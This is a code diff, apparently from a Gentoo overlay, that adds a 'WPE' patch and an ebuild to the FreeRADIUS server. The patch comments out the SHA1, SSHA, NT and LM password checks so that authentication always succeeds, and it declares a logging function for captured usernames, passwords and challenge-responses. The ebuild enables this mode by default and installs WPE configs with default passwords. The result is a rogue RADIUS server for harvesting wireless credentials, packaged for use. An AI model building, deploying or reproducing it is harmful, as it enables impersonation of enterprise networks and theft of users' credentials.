snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +732,13 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +760,14 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +787,21 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+/*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+*/
goto done;
break;
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h 2011-11-05 09:44:19.347294768 +0800
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h 2011-11-05 09:49:42.750274303 +0800
@@ -546,6 +546,7 @@
__attribute__ ((format (printf, 2, 3)))
#endif
;
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen);
int log_debug(const char *, ...)
#ifdef __GNUC__
__attribute__ ((format (printf, 1, 2)))

3
net-dialup/freeradius/files/users_wpe Normal file
View file

@ -0,0 +1,3 @@
DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
DEFAULT Cleartext-Password := "a"

156
net-dialup/freeradius/freeradius-2.1.11-r1.ebuild Normal file
View file

@ -0,0 +1,156 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.11.ebuild,v 1.3 2011/10/13 12:16:12 nativemad Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
enewgroup radiusd
enewuser radiusd -1 -1 /var/log/radius radiusd
}
src_prepare() {
epatch "${FILESDIR}/${PN}-2.1.10-versionless-la-files.patch"
epatch "${FILESDIR}/${PN}-2.1.10-ssl.patch"
epatch "${FILESDIR}/${PN}-2.1.10-qafixes.patch"
epatch "${FILESDIR}/${PN}-2.1.10-pkglibdir.patch"
if use wpe; then epatch "${FILESDIR}/${P}-wpe.patch"; fi
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf} || die "econf failed"
}
src_compile() {
emake -j1 || die "emake failed"
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radiusd
dodir /etc/raddb
diropts -m0750 -o radiusd -g radiusd
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${D}" install || die "make install failed"
sed -i -e 's:^#user *= *nobody:user = radiusd:;s:^#group *= *nobody:group = radiusd:' \
"${D}"/etc/raddb/radiusd.conf
chown -R root:radiusd "${D}"/etc/raddb/*
pamd_mimic_system radiusd auth account password session
mv "${D}/usr/share/doc/${PN}" "${D}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r1" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${D}"/etc/raddb/certs
emake all
}

2
net-dialup/freeradius/freeradius-2.1.7-r1.ebuild
View file

@ -24,7 +24,7 @@ RDEPEND="!net-dialup/cistronradius
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( virtual/postgresql-server )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )